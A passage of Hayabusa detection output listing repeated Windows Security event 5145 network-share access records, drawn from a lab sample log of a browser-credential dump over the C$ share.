0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.437 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx +2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | 
LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 
10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.692 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
